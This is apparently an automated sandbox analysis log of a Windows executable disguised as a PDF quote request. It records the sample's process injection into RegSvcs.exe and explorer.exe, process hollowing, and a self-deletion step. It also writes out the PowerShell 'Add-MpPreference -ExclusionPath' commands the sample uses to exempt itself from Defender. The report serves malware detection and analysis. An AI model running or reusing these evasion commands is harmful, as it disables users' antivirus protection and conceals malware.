Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7CA72 mov eax, dword ptr fs:[00000030h]	19_2_00F7CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7CA72 mov eax, dword ptr fs:[00000030h]	19_2_00F7CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAEA60 mov eax, dword ptr fs:[00000030h]	19_2_00FAEA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3CA6F mov eax, dword ptr fs:[00000030h]	19_2_00F3CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3CA6F mov eax, dword ptr fs:[00000030h]	19_2_00F3CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3CA6F mov eax, dword ptr fs:[00000030h]	19_2_00F3CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]	19_2_00F06A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]	19_2_00F06A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]	19_2_00F06A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]	19_2_00F06A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]	19_2_00F06A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]	19_2_00F06A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]	19_2_00F06A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10A5B mov eax, dword ptr fs:[00000030h]	19_2_00F10A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10A5B mov eax, dword ptr fs:[00000030h]	19_2_00F10A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F24A35 mov eax, dword ptr fs:[00000030h]	19_2_00F24A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F24A35 mov eax, dword ptr fs:[00000030h]	19_2_00F24A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3CA38 mov eax, dword ptr fs:[00000030h]	19_2_00F3CA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3CA24 mov eax, dword ptr fs:[00000030h]	19_2_00F3CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2EA2E mov eax, dword ptr fs:[00000030h]	19_2_00F2EA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8CA11 mov eax, dword ptr fs:[00000030h]	19_2_00F8CA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F08BF0 mov eax, dword ptr fs:[00000030h]	19_2_00F08BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F08BF0 mov eax, dword ptr fs:[00000030h]	19_2_00F08BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F08BF0 mov eax, dword ptr fs:[00000030h]	19_2_00F08BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8CBF0 mov eax, dword ptr fs:[00000030h]	19_2_00F8CBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2EBFC mov eax, dword ptr fs:[00000030h]	19_2_00F2EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAEBD0 mov eax, dword ptr fs:[00000030h]	19_2_00FAEBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F20BCB mov eax, dword ptr fs:[00000030h]	19_2_00F20BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F20BCB mov eax, dword ptr fs:[00000030h]	19_2_00F20BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F20BCB mov eax, dword ptr fs:[00000030h]	19_2_00F20BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F00BCD mov eax, dword ptr fs:[00000030h]	19_2_00F00BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F00BCD mov eax, dword ptr fs:[00000030h]	19_2_00F00BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F00BCD mov eax, dword ptr fs:[00000030h]	19_2_00F00BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB4BB0 mov eax, dword ptr fs:[00000030h]	19_2_00FB4BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB4BB0 mov eax, dword ptr fs:[00000030h]	19_2_00FB4BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10BBE mov eax, dword ptr fs:[00000030h]	19_2_00F10BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10BBE mov eax, dword ptr fs:[00000030h]	19_2_00F10BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFCB7E mov eax, dword ptr fs:[00000030h]	19_2_00EFCB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAEB50 mov eax, dword ptr fs:[00000030h]	19_2_00FAEB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD2B57 mov eax, dword ptr fs:[00000030h]	19_2_00FD2B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD2B57 mov eax, dword ptr fs:[00000030h]	19_2_00FD2B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD2B57 mov eax, dword ptr fs:[00000030h]	19_2_00FD2B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD2B57 mov eax, dword ptr fs:[00000030h]	19_2_00FD2B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB4B4B mov eax, dword ptr fs:[00000030h]	19_2_00FB4B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB4B4B mov eax, dword ptr fs:[00000030h]	19_2_00FB4B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA8B42 mov eax, dword ptr fs:[00000030h]	19_2_00FA8B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F96B40 mov eax, dword ptr fs:[00000030h]	19_2_00F96B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F96B40 mov eax, dword ptr fs:[00000030h]	19_2_00F96B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCAB40 mov eax, dword ptr fs:[00000030h]	19_2_00FCAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF8B50 mov eax, dword ptr fs:[00000030h]	19_2_00EF8B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2EB20 mov eax, dword ptr fs:[00000030h]	19_2_00F2EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2EB20 mov eax, dword ptr fs:[00000030h]	19_2_00F2EB20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 15_2_00402B7C GetProcessHeap,RtlAllocateHeap,

15_2_00402B7C

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

Memory allocated: page read and write | page guard

Adds a directory exclusion to Windows Defender

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3504
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 3504

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: BA0000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 887008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 745008	Jump to behavior

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Source: explorer.exe, 00000014.00000002.3749287712.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.1335993488.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000014.00000003.2297215475.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3749287712.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000002.3749287712.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.1335993488.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000014.00000002.3749287712.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.1335993488.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000014.00000000.1334199504.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3741150645.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanq

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Queries volume information: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
